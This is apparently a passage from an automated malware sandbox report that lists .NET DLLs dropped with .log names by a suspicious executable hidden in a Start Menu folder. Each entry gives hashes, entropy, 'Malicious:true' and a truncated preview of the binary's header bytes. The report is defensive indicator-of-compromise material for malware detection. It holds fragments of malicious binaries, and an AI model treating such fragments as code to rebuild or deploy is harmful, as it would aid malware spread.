                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\qHVggSrJ.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):28160
                                                        Entropy (8bit):5.570953308352568
                                                        Encrypted:false
                                                        SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                        MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                        SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                        SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                        SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\qmowuovM.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):85504
                                                        Entropy (8bit):5.8769270258874755
                                                        Encrypted:false
                                                        SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                        MD5:E9CE850DB4350471A62CC24ACB83E859
                                                        SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                        SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                        SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                        C:\Users\user\Desktop\qnXVOghu.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):34304
                                                        Entropy (8bit):5.618776214605176
                                                        Encrypted:false
                                                        SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                        MD5:9B25959D6CD6097C0EF36D2496876249
                                                        SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                        SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                        SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\qwtgsSmh.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):70144
                                                        Entropy (8bit):5.909536568846014
                                                        Encrypted:false
                                                        SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                        MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                        SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                        SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                        SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\rAWXeJDJ.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):70144
                                                        Entropy (8bit):5.909536568846014
                                                        Encrypted:false
                                                        SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                        MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                        SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                        SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                        SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\rGeXPKfd.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):34816
                                                        Entropy (8bit):5.636032516496583
                                                        Encrypted:false
                                                        SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                        MD5:996BD447A16F0A20F238A611484AFE86
                                                        SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                        SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                        SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\rkdyzPpO.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):126976
                                                        Entropy (8bit):6.057993947082715
                                                        Encrypted:false
                                                        SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                        MD5:16B480082780CC1D8C23FB05468F64E7
                                                        SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                        SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                        SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                        C:\Users\user\Desktop\roNndSaI.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24064
                                                        Entropy (8bit):5.4346552043530165
                                                        Encrypted:false
                                                        SSDEEP:384:fTcm673m4NrYnbspeYMDnw4aU04pWfs8xLDpHEm1r1yNq/:ABNUbfYM8NT4pWkoDxfB4N
                                                        MD5:1DCDE09C6A8CE8F5179FB24D0C5A740D
                                                        SHA1:1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
                                                        SHA-256:1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
                                                        SHA-512:5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.....V...........t... ........@.. ....................................@..................................s..S.................................................................................... ............... ..H............text....T... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................s......H........Q..."...........O......................................................................................................................................................................xHz9..T....[.y..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\sFKgoXgD.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33792
                                                        Entropy (8bit):5.541771649974822
                                                        Encrypted:false
                                                        SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                        MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                        SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                        SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                        SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\sJafoJXg.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):41472
                                                        Entropy (8bit):5.6808219961645605
                                                        Encrypted:false
                                                        SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                        MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                        SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                        SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                        SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\sKHPBBwF.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):39936
                                                        Entropy (8bit):5.660491370279985
                                                        Encrypted:false
                                                        SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                        MD5:240E98D38E0B679F055470167D247022
                                                        SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                        SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                        SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\sMBlRSok.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):38400
                                                        Entropy (8bit):5.699005826018714
                                                        Encrypted:false
                                                        SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                        MD5:87765D141228784AE91334BAE25AD743
                                                        SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                        SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                        SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\sPQEsCmi.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):38912
                                                        Entropy (8bit):5.679286635687991
                                                        Encrypted:false
                                                        SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                        MD5:9E910782CA3E88B3F87826609A21A54E
                                                        SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                        SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                        SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\sgXWGXfk.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):39936
                                                        Entropy (8bit):5.660491370279985
                                                        Encrypted:false
                                                        SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                        MD5:240E98D38E0B679F055470167D247022
                                                        SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                        SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                        SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\shEGUPEJ.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):85504
                                                        Entropy (8bit):5.8769270258874755
                                                        Encrypted:false
                                                        SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                        MD5:E9CE850DB4350471A62CC24ACB83E859
                                                        SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                        SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                        SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                        C:\Users\user\Desktop\spJDjPmp.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):34816
                                                        Entropy (8bit):5.636032516496583
                                                        Encrypted:false
                                                        SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                        MD5:996BD447A16F0A20F238A611484AFE86
                                                        SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                        SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                        SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\tdyfcXuf.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):294912
                                                        Entropy (8bit):6.010605469502259
                                                        Encrypted:false
                                                        SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                        MD5:00574FB20124EAFD40DC945EC86CA59C
                                                        SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                        SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                        SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                        C:\Users\user\Desktop\tlovySpD.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):70144
                                                        Entropy (8bit):5.909536568846014
                                                        Encrypted:false
                                                        SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                        MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                        SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                        SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                        SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\toafQXzH.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):36352
                                                        Entropy (8bit):5.668291349855899
                                                        Encrypted:false
                                                        SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                        MD5:94DA5073CCC14DCF4766DF6781485937
                                                        SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                        SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                        SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\trTNZned.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):38912
                                                        Entropy (8bit):5.679286635687991
                                                        Encrypted:false
                                                        SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                        MD5:9E910782CA3E88B3F87826609A21A54E
                                                        SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                        SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                        SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\uMuxXkBA.log

